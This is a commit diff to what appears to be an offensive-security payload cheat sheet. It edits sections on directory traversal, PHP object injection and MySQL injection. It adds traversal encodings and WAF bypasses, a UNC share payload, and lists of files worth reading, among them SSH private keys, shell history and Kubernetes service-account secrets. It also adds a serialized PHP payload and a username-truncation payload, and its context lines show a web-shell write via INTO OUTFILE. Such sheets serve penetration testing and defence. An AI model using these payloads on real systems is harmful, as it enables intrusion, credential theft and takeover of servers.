Fix typo in PHP Object injection

Directory Traversal/README.md

@@ -6,7 +6,14 @@
 
 * [Tools](#tools)
 * [Basic exploitation](#basic-exploitation)
+    * [16 bits Unicode encoding](#)
+    * [UTF-8 Unicode encoding](#)
+    * [Bypass "../" replaced by ""](#)
+    * [Double URL encoding](#)
+    * [UNC Bypass](#unc-bypass)
 * [Path Traversal](#path-traversal)
+    * [Interesting Linux files](#)
+    * [Interesting Windows files](#)
 
 ## Tools
 
@@ -31,7 +38,7 @@ We can use the `..` characters to access the parent directory, the following str
 %uff0e%uff0e%u2216
 ```
 
-16 bit Unicode encoding
+### 16 bits Unicode encoding
 
 ```powershell
 . = %u002e
@@ -39,7 +46,7 @@ We can use the `..` characters to access the parent directory, the following str
 \ = %u2216
 ```
 
-UTF-8 Unicode encoding
+### UTF-8 Unicode encoding
 
 ```powershell
 . = %c0%2e, %e0%40%ae, %c0ae
@@ -47,6 +54,7 @@ UTF-8 Unicode encoding
 \ = %c0%5c, %c0%80%5c
 ```
 
+### Bypass "../" replaced by ""
 Sometimes you encounter a WAF which remove the "../" characters from the strings, just duplicate them.
 
 ```powershell
@@ -54,7 +62,7 @@ Sometimes you encounter a WAF which remove the "../" characters from the strings
 ...\.\
 ```
 
-Double URL encoding
+### Double URL encoding
 
 ```powershell
 . = %252e
@@ -62,10 +70,18 @@ Double URL encoding
 \ = %255c
 ```
 
+### UNC Bypass
+
+An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file.
+
+```powershell
+\\localhost\c$\windows\win.ini
+```
+
 
 ## Path Traversal
 
-Linux - Interesting files to check out :
+### Interesting Linux files
 
 ```powershell
 /etc/issue
@@ -85,9 +101,16 @@ Linux - Interesting files to check out :
 /proc/net/route
 /proc/net/tcp
 /proc/net/udp
+/proc/self/cwd/index.php
+/proc/self/cwd/main.py
+/home/$USER/.bash_history
+/home/$USER/.ssh/id_rsa
+/var/run/secrets/kubernetes.io/serviceaccount
 ```
 
-Windows - Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
+### Interesting Windows files
+
+Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
 
 ```powershell
 c:/boot.ini
@@ -127,15 +150,7 @@ The following log files are controllable and can be included with an evil payloa
 /var/log/mail
 ```
 
-Other easy win files.
-
-```powershell
-/proc/self/cwd/index.php
-/home/$USER/.bash_history
-/var/run/secrets/kubernetes.io/serviceaccount
-```
-
-
 ## References
 
 * [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack)
+* [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html)

Insecure Deserialization/PHP.md

@@ -99,7 +99,7 @@ if($obj) {
 Payload:
 
 ```php
-O:6:"Object":2:{s:10:"secretCode";N;s:4:"code";R:2;}
+O:6:"Object":2:{s:10:"secretCode";N;s:4:"guess";R:2;}
 ```
 
 ## Others exploits

SQL Injection/MySQL Injection.md

@@ -263,6 +263,12 @@ SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo
 
 In MYSQL "`admin `" and "`admin`" are the same. If the username column in the database has a character-limit the rest of the characters are truncated. So if the database has a column-limit of 20 characters and we input a string with 21 characters the last 1 character will be removed.
 
+```sql
+`username` varchar(20) not null
+```
+
+Payload: `username = "admin               a"`
+
 ## MYSQL UDF command execution
 
 First you need to check if the UDF are installed on the server.